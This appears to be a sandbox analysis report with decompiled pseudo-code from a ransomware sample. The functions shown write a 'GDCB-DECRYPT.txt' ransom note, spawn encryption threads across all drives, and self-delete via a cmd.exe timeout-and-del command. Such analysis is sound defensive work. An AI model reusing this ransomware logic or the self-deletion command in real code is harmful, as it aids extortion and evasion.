                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
                                      • lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CE8
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CF6
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID:
                                      • API String ID: 1659193697-0
                                      • Opcode ID: b7784ce1624038f5bbd5c7dcf95e2abfdb0947caf69f15ff149bb7f942ea0507
                                      • Instruction ID: 0763c41813d47cec7f7f3bb87dd63c09dcdfaa37f7dde6f7b674e60aab311cac
                                      • Opcode Fuzzy Hash: b7784ce1624038f5bbd5c7dcf95e2abfdb0947caf69f15ff149bb7f942ea0507
                                      • Instruction Fuzzy Hash: BA412B32200611EFD7125FB8DE8C796BBB2FF04315F094539E416A2A62D775AC78DB88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405270(WCHAR* __ecx) {
                                      				CHAR* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				void* _t22;
                                      				void* _t24;
                                      				signed int _t26;
                                      				int _t30;
                                      				char _t32;
                                      				void* _t33;
                                      				signed char _t34;
                                      				CHAR* _t36;
                                      				WCHAR* _t37;
                                      				WCHAR* _t38;
                                      				void* _t39;
                                      				CHAR* _t40;
                                      
                                      				_t37 = __ecx;
                                      				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
                                      				_v20 = _t39;
                                      				GetModuleFileNameW(0, _t39, 0x200);
                                      				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
                                      				_v16 = _t33;
                                      				if(_t33 != 0xffffffff) {
                                      					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
                                      					_v24 = _t22;
                                      					if(_t22 != 0) {
                                      						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
                                      						_v12 = _t24;
                                      						if(_t24 != 0) {
                                      							_t5 = _t24 + 0x4e; // 0x4e
                                      							_t40 = _t5;
                                      							_v8 = _t40;
                                      							_t26 = lstrlenW(_t37);
                                      							_t34 = 0;
                                      							_t38 =  &(_t37[_t26]);
                                      							if(lstrlenA(_t40) + _t27 != 0) {
                                      								_t36 = _t40;
                                      								do {
                                      									if((_t34 & 0x00000001) != 0) {
                                      										 *((char*)(_t38 + _t34)) = 0;
                                      									} else {
                                      										_t32 =  *_t40;
                                      										_t40 =  &(_t40[1]);
                                      										 *((char*)(_t38 + _t34)) = _t32;
                                      									}
                                      									_t34 = _t34 + 1;
                                      									_t30 = lstrlenA(_t36);
                                      									_t36 = _v8;
                                      								} while (_t34 < _t30 + _t30);
                                      							}
                                      							UnmapViewOfFile(_v12);
                                      							_t33 = _v16;
                                      							_t39 = _v20;
                                      						}
                                      						CloseHandle(_v24);
                                      					}
                                      					CloseHandle(_t33);
                                      				}
                                      				return VirtualFree(_t39, 0, 0x8000);
                                      			}




















                                      0x00405287
                                      0x0040528f
                                      0x00405299
                                      0x0040529c
                                      0x004052bb
                                      0x004052bd
                                      0x004052c3
                                      0x004052d4
                                      0x004052da
                                      0x004052df
                                      0x004052ea
                                      0x004052f0
                                      0x004052f5
                                      0x004052f7
                                      0x004052f7
                                      0x004052fb
                                      0x004052fe
                                      0x00405305
                                      0x00405307
                                      0x00405312
                                      0x00405314
                                      0x00405316
                                      0x00405319
                                      0x00405323
                                      0x0040531b
                                      0x0040531b
                                      0x0040531d
                                      0x0040531e
                                      0x0040531e
                                      0x00405328
                                      0x00405329
                                      0x0040532f
                                      0x00405334
                                      0x00405316
                                      0x0040533b
                                      0x00405341
                                      0x00405344
                                      0x00405344
                                      0x0040534a
                                      0x0040534a
                                      0x00405351
                                      0x00405351
                                      0x0040536b

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,74CF81D0,00000000,?,?,?,?,00405482), ref: 00405289
                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,00405482), ref: 0040529C
                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00405482), ref: 004052B5
                                      • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,00405482), ref: 004052D4
                                      • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,00405482), ref: 004052EA
                                      • lstrlenW.KERNEL32(?,?,?,?,?,00405482), ref: 004052FE
                                      • lstrlenA.KERNEL32(0000004E,?,?,?,?,00405482), ref: 0040530A
                                      • lstrlenA.KERNEL32(0000004E,?,?,?,?,00405482), ref: 00405329
                                      • UnmapViewOfFile.KERNEL32(?,?,?,?,?,00405482), ref: 0040533B
                                      • CloseHandle.KERNEL32(?,?,?,?,?,00405482), ref: 0040534A
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00405482), ref: 00405351
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,00405482), ref: 0040535F
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
                                      • String ID:
                                      • API String ID: 869890170-0
                                      • Opcode ID: 8d8f66e7a3aa33aaa14d7d124576a6fa184a176826b3374fbd9b00ab5f319adc
                                      • Instruction ID: 2f98b26bd8e2ee7d85d2e29faddfdf40e9a873387be652c4beaa2a3b1dd5d715
                                      • Opcode Fuzzy Hash: 8d8f66e7a3aa33aaa14d7d124576a6fa184a176826b3374fbd9b00ab5f319adc
                                      • Instruction Fuzzy Hash: 4231A531740715BBEB205B649D4EF5E7B68EB05B40F200075FB41BA2D2C6F5A9018FAC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00406640(void* __ecx) {
                                      				long _v8;
                                      				WCHAR* _t7;
                                      				signed int _t16;
                                      				void* _t21;
                                      				void* _t22;
                                      				void* _t25;
                                      
                                      				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
                                      				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
                                      				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
                                      				if(_t22 != 0xffffffff) {
                                      					_t7 =  *0x412b04; // 0x412000
                                      					if(_t7 != 0) {
                                      						WriteFile(_t22,  *0x412b04, lstrlenW(_t7) + _t11,  &_v8, 0);
                                      					}
                                      					CloseHandle(_t22);
                                      					_t16 = 1;
                                      				} else {
                                      					_t16 = 0 | GetLastError() == 0x000000b7;
                                      				}
                                      				VirtualFree(_t25, 0, 0x8000);
                                      				return _t16;
                                      			}









                                      0x0040665b
                                      0x00406663
                                      0x00406685
                                      0x0040668a
                                      0x0040669e
                                      0x004066a5
                                      0x004066be
                                      0x004066be
                                      0x004066c5
                                      0x004066cb
                                      0x0040668c
                                      0x00406699
                                      0x00406699
                                      0x004066d8
                                      0x004066e6

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00406722,00000000,?,?), ref: 00406655
                                      • wsprintfW.USER32 ref: 00406663
                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0040667F
                                      • GetLastError.KERNEL32(?,?), ref: 0040668C
                                      • lstrlenW.KERNEL32(00412000,?,00000000,?,?), ref: 004066AE
                                      • WriteFile.KERNEL32(00000000,00000000,?,?), ref: 004066BE
                                      • CloseHandle.KERNEL32(00000000,?,?), ref: 004066C5
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004066D8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
                                      • String ID: %s\GDCB-DECRYPT.txt
                                      • API String ID: 2985722263-4054134092
                                      • Opcode ID: bc3a2ebfe9eeb877b40095771c2eb21f56d946499f613914195d7b6821dfde9f
                                      • Instruction ID: 9b1f1ee7684b205ce34ce946b48542e85b02e5c2206a3fbb18e6830c08f85e02
                                      • Opcode Fuzzy Hash: bc3a2ebfe9eeb877b40095771c2eb21f56d946499f613914195d7b6821dfde9f
                                      • Instruction Fuzzy Hash: 2D0171753802107BF7205B64AE4EFAA3A6CEB49B15F100135FB05F91E1DBF96C11866D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00404FD0() {
                                      				WCHAR* _t6;
                                      				short* _t8;
                                      
                                      				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      				if(_t6 != 0) {
                                      					GetModuleFileNameW(0, _t6, 0x200);
                                      					if(_t8 != 0) {
                                      						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
                                      						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
                                      					}
                                      				}
                                      				ExitProcess(0);
                                      			}





                                      0x00404ff6
                                      0x00404ffa
                                      0x00404ffe
                                      0x00405008
                                      0x00405010
                                      0x00405019
                                      0x00405033
                                      0x00405033
                                      0x00405010
                                      0x0040503b

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,0040526B,00000000), ref: 00404FE6
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00404FF8
                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00405008
                                      • wsprintfW.USER32 ref: 00405019
                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00405033
                                      • ExitProcess.KERNEL32 ref: 0040503B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
                                      • String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
                                      • API String ID: 4033023619-516011104
                                      • Opcode ID: e6b0716a671a28e0b9e882897ebb5d15568001f9354c485655236bd259232091
                                      • Instruction ID: 72ce1eeed403cc9d60347bc981b2010fd1fdc34af71b64a0c2a2ed5fbb2db01d
                                      • Opcode Fuzzy Hash: e6b0716a671a28e0b9e882897ebb5d15568001f9354c485655236bd259232091
                                      • Instruction Fuzzy Hash: E2F0C971BC572277F2351B655D0FF4B2D689B85F56F250036BB087E2D28AF468008AED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403200(void* __ecx, char _a4, intOrPtr _a8) {
                                      				char _t5;
                                      				char _t6;
                                      				intOrPtr _t8;
                                      				int _t10;
                                      				CHAR* _t13;
                                      				int _t15;
                                      				void* _t18;
                                      				CHAR* _t21;
                                      				CHAR* _t23;
                                      
                                      				_t1 =  &_a4; // 0x405135
                                      				_t23 =  *_t1;
                                      				_t18 = __ecx;
                                      				_t5 =  *_t23;
                                      				if(_t5 == 0) {
                                      					L4:
                                      					_t6 =  *_t23;
                                      					if(_t6 == 0x7d) {
                                      						goto L10;
                                      					} else {
                                      						_t21 = _t23;
                                      						if(_t6 != 0) {
                                      							while( *_t21 != 0x7d) {
                                      								_t21 =  &(_t21[1]);
                                      								if( *_t21 != 0) {
                                      									continue;
                                      								} else {
                                      								}
                                      								goto L12;
                                      							}
                                      							 *_t21 = 0;
                                      						}
                                      						L12:
                                      						_t8 = _a8;
                                      						if(_t8 != 1) {
                                      							if(_t8 == 2) {
                                      								_t10 = lstrlenA(_t23);
                                      								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
                                      								 *(_t18 + 8) = _t13;
                                      								goto L16;
                                      							}
                                      						} else {
                                      							_t15 = lstrlenA(_t23);
                                      							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
                                      							 *(_t18 + 4) = _t13;
                                      							L16:
                                      							if(_t13 != 0) {
                                      								lstrcpyA(_t13, _t23);
                                      							}
                                      						}
                                      						 *_t21 = 0x7d;
                                      						return 1;
                                      					}
                                      				} else {
                                      					while(_t5 != 0x7d) {
                                      						_t23 =  &(_t23[1]);
                                      						if(_t5 == 0x3d) {
                                      							goto L4;
                                      						} else {
                                      							_t5 =  *_t23;
                                      							if(_t5 != 0) {
                                      								continue;
                                      							} else {
                                      								goto L4;
                                      							}
                                      						}
                                      						goto L19;
                                      					}
                                      					L10:
                                      					return 0;
                                      				}
                                      				L19:
                                      			}












                                      0x00403205
                                      0x00403205
                                      0x00403208
                                      0x0040320a
                                      0x0040320e
                                      0x0040321f
                                      0x0040321f
                                      0x00403223
                                      0x00000000
                                      0x00403225
                                      0x00403226
                                      0x0040322a
                                      0x00403230
                                      0x00403235
                                      0x00403239
                                      0x00000000
                                      0x00000000
                                      0x0040323b
                                      0x00000000
                                      0x00403239
                                      0x00403245
                                      0x00403245
                                      0x00403248
                                      0x00403248
                                      0x0040324e
                                      0x00403270
                                      0x00403273
                                      0x00403284
                                      0x0040328a
                                      0x00000000
                                      0x0040328a
                                      0x00403250
                                      0x00403251
                                      0x00403262
                                      0x00403268
                                      0x0040328d
                                      0x0040328f
                                      0x00403293
                                      0x00403293
                                      0x0040328f
                                      0x00403299
                                      0x004032a5
                                      0x004032a5
                                      0x00403210
                                      0x00403210
                                      0x00403214
                                      0x00403217
                                      0x00000000
                                      0x00403219
                                      0x00403219
                                      0x0040321d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040321d
                                      0x00000000
                                      0x00403217
                                      0x0040323e
                                      0x00403242
                                      0x00403242
                                      0x00000000

                                      APIs
                                      • lstrlenA.KERNEL32(5Q@,00000000,?,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403251
                                      • GetProcessHeap.KERNEL32(00000008,00000001,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 0040325B
                                      • HeapAlloc.KERNEL32(00000000,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403262
                                      • lstrlenA.KERNEL32(5Q@,00000000,?,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403273
                                      • GetProcessHeap.KERNEL32(00000008,00000001,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 0040327D
                                      • HeapAlloc.KERNEL32(00000000,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403284
                                      • lstrcpyA.KERNEL32(00000000,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403293
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen$lstrcpy
                                      • String ID: 5Q@$5Q@
                                      • API String ID: 511007297-547021831
                                      • Opcode ID: b788b534275cfb914030b1c27688c49dd11fa4b54458ea966c16f7cdcb022cd9
                                      • Instruction ID: bda05b356578e7771a31f68481e16acc2b94da25dd7eb2ac23c0ab8e8a28fe1a
                                      • Opcode Fuzzy Hash: b788b534275cfb914030b1c27688c49dd11fa4b54458ea966c16f7cdcb022cd9
                                      • Instruction Fuzzy Hash: 9A119330504295AAEB211F68990C767BF5CAF12352F2440BFE8C5FB391C7398D4687A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00403DE0(struct _SECURITY_ATTRIBUTES* __ecx) {
                                      				char _v612;
                                      				char _v644;
                                      				void* _v908;
                                      				void* _v912;
                                      				intOrPtr _v916;
                                      				intOrPtr _v920;
                                      				short _v924;
                                      				signed int _v928;
                                      				intOrPtr _v932;
                                      				void* _v936;
                                      				intOrPtr _v940;
                                      				intOrPtr _v944;
                                      				intOrPtr _v948;
                                      				long _v952;
                                      				struct _SECURITY_ATTRIBUTES* _v956;
                                      				struct _SECURITY_ATTRIBUTES* _v960;
                                      				struct _SECURITY_ATTRIBUTES* _v964;
                                      				char _v968;
                                      				void* _t67;
                                      				short _t68;
                                      				intOrPtr _t69;
                                      				int _t72;
                                      				long _t75;
                                      				signed int _t77;
                                      				signed int _t80;
                                      				intOrPtr* _t82;
                                      				void* _t84;
                                      				struct _SECURITY_ATTRIBUTES* _t87;
                                      				long _t88;
                                      				intOrPtr _t89;
                                      				intOrPtr _t92;
                                      				intOrPtr _t95;
                                      				char _t101;
                                      				intOrPtr _t106;
                                      				void _t110;
                                      				struct _SECURITY_ATTRIBUTES** _t114;
                                      				intOrPtr _t115;
                                      				signed int _t119;
                                      				void* _t121;
                                      
                                      				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
                                      				_t87 = __ecx;
                                      				_v964 = __ecx;
                                      				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
                                      				 *((intOrPtr*)(_t67 + 4)) = _t87;
                                      				_t88 = 0;
                                      				 *_t67 = 0x43;
                                      				_t68 =  *L"?:\\"; // 0x3a003f
                                      				_v924 = _t68;
                                      				_t69 =  *0x40e308; // 0x5c
                                      				_v920 = _t69;
                                      				_v968 = GetTickCount();
                                      				_t114 =  &_v644;
                                      				_t110 = 0x41;
                                      				do {
                                      					_v924 = _t110;
                                      					_t72 = GetDriveTypeW( &_v924);
                                      					if(_t72 >= 2 && _t72 != 5) {
                                      						 *((intOrPtr*)(_t114 - 4)) = _v964;
                                      						_t84 = _t114 - 8;
                                      						 *_t84 = _t110;
                                      						 *_t114 = 0;
                                      						_t114[2] = 0;
                                      						_t114[3] = 0;
                                      						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E00406840, _t84, 0, 0);
                                      						_t88 = _t88 + 1;
                                      						_t114 =  &(_t114[6]);
                                      					}
                                      					_t110 = _t110 + 1;
                                      				} while (_t110 <= 0x5a);
                                      				_v952 = _t88;
                                      				asm("xorps xmm0, xmm0");
                                      				_v956 = 0;
                                      				_v960 = 0;
                                      				asm("movlpd [esp+0x38], xmm0");
                                      				asm("movlpd [esp+0x30], xmm0");
                                      				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
                                      				_t75 = GetTickCount();
                                      				asm("xorps xmm0, xmm0");
                                      				_t115 = _v948;
                                      				_v932 = _t75 - _v968;
                                      				_t77 = 0;
                                      				_v964 = 0;
                                      				asm("movlpd [esp+0x40], xmm0");
                                      				if(_t88 < 2) {
                                      					_t95 = _v940;
                                      					_t106 = _v944;
                                      				} else {
                                      					_t26 = _t88 - 2; // -1
                                      					_t92 = _v940;
                                      					_t82 =  &_v612;
                                      					_t101 = (_t26 >> 1) + 1;
                                      					_v968 = _t101;
                                      					_v928 = _t101 + _t101;
                                      					_t106 = _v944;
                                      					do {
                                      						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
                                      						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
                                      						asm("adc edi, [eax-0x14]");
                                      						_t115 = _t115 +  *_t82;
                                      						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
                                      						asm("adc edx, [eax+0x4]");
                                      						_t82 = _t82 + 0x30;
                                      						_t41 =  &_v968;
                                      						 *_t41 = _v968 - 1;
                                      					} while ( *_t41 != 0);
                                      					_t77 = _v928;
                                      					_v968 = _t92;
                                      					_t88 = _v952;
                                      					_t95 = _v968;
                                      				}
                                      				if(_t77 >= _t88) {
                                      					_t89 = _v916;
                                      				} else {
                                      					_t80 = _t77 + _t77 * 2;
                                      					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
                                      					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
                                      				}
                                      				asm("adc edx, edi");
                                      				asm("adc edx, eax");
                                      				return E00405540(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
                                      			}










































                                      0x00403de6
                                      0x00403df8
                                      0x00403dfc
                                      0x00403e00
                                      0x00403e0b
                                      0x00403e0e
                                      0x00403e10
                                      0x00403e13
                                      0x00403e18
                                      0x00403e1c
                                      0x00403e21
                                      0x00403e2b
                                      0x00403e2f
                                      0x00403e36
                                      0x00403e40
                                      0x00403e44
                                      0x00403e4a
                                      0x00403e53
                                      0x00403e62
                                      0x00403e65
                                      0x00403e72
                                      0x00403e75
                                      0x00403e7b
                                      0x00403e82
                                      0x00403e8f
                                      0x00403e93
                                      0x00403e94
                                      0x00403e94
                                      0x00403e97
                                      0x00403e98
                                      0x00403ea6
                                      0x00403eaa
                                      0x00403ead
                                      0x00403eb7
                                      0x00403ebf
                                      0x00403ec5
                                      0x00403ecb
                                      0x00403ed1
                                      0x00403edb
                                      0x00403ee2
                                      0x00403ee6
                                      0x00403eea
                                      0x00403eec
                                      0x00403ef4
                                      0x00403efd
                                      0x00403f5c
                                      0x00403f60
                                      0x00403eff
                                      0x00403eff
                                      0x00403f02
                                      0x00403f08
                                      0x00403f0f
                                      0x00403f10
                                      0x00403f17
                                      0x00403f1b
                                      0x00403f20
                                      0x00403f27
                                      0x00403f2a
                                      0x00403f2e
                                      0x00403f38
                                      0x00403f3a
                                      0x00403f3e
                                      0x00403f41
                                      0x00403f44
                                      0x00403f44
                                      0x00403f44
                                      0x00403f4a
                                      0x00403f4e
                                      0x00403f52
                                      0x00403f56
                                      0x00403f56
                                      0x00403f66
                                      0x00403f8a
                                      0x00403f68
                                      0x00403f68
                                      0x00403f72
                                      0x00403f76
                                      0x00403f7d
                                      0x00403f94
                                      0x00403f98
                                      0x00403fb6

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 00403E00
                                      • GetTickCount.KERNEL32 ref: 00403E25
                                      • GetDriveTypeW.KERNEL32(?), ref: 00403E4A
                                      • CreateThread.KERNEL32 ref: 00403E89
                                      • WaitForMultipleObjects.KERNEL32(00000000,?), ref: 00403ECB
                                      • GetTickCount.KERNEL32 ref: 00403ED1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
                                      • String ID: ?:\
                                      • API String ID: 458387131-2533537817
                                      • Opcode ID: 3380b7a9da389f35d06b469346c9bb498d51bc5a763c595ddef6b732e49dbda3
                                      • Instruction ID: a427c5faede150c50d802e976730206525a879d89cb9664245e235534ffcdea3
                                      • Opcode Fuzzy Hash: 3380b7a9da389f35d06b469346c9bb498d51bc5a763c595ddef6b732e49dbda3
                                      • Instruction Fuzzy Hash: FF5136719083019FC310CF14C988B5BBBE5FF88315F504A2EFA89A73A1D375A944CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00406840(void* _a4) {
                                      				intOrPtr _v0;
                                      				intOrPtr _v4;
                                      				long _v8;
                                      				intOrPtr _v12;
                                      				void* _v16;
                                      				struct _CRITICAL_SECTION _v40;
                                      				WCHAR* _t12;
                                      				void* _t22;
                                      
                                      				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                      				_t22 = _a4;
                                      				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
                                      				InitializeCriticalSection( &_v40);
                                      				_v12 = 0x2710;
                                      				_v8 = 0;
                                      				_v4 = 0xffffffff;
                                      				_v0 = 0xffffffff;
                                      				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
                                      				E004066F0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
                                      				VirtualFree(_t22, 0, 0x8000);
                                      				ExitThread(0);
                                      			}











                                      0x00406859
                                      0x0040685f
